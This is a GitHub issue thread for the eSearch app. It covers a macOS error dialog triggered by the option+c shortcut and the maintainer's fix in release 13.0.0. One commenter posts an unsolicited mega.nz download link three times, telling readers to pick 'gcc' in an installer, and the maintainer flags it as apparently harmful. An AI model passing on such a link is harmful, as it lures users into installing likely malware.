### ISSUE TITLE
macos 14.5 (23F79)使用全局自动识别快捷键打开软件，会弹出报错弹窗，叉掉后可以正常使用。弹窗内容详细如下

### ISSUE THREAD

**Issue by lxk960772214** [xushengfeng/eSearch#258]
### 描述问题

A JavaScript error occurred in the main process

Uncaught Exception:
TypeError: Cannot read properties of undefined (reading 'webContents')
at y (/Applications/e-search.app/Contents/Resources/app/out/main/main.js:2:19039)
at click (/Applications/e-search.app/Contents/Resources/app/out/main/main.js:2:3949)
at MenuItem.click (node:electron/js2c/browser_init:2:30212)
at a._executeCommand (node:electron/js2c/browser_init:2:35608)

### 重现步骤

option+c

### 更多信息

![image](https://github.com/user-attachments/assets/8c3cc4ca-1695-4e03-a82f-119c741c4a00)

### 软件版本

1.12.4

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by lxk960772214** [comment]
> Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."

我是mac，您这个下载链接好像是针对windows的

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by xushengfeng** [comment]
@lxk960772214 刚刚那个用户提供的链接似乎有害，注意小心

**Comment by xushengfeng** [comment]
好像是与复制快捷键冲突了，你可以更改自动搜索的快捷键

**Comment by xushengfeng** [comment]
https://github.com/xushengfeng/eSearch/releases/tag/13.0.0 增加了判断，应该不会报错了
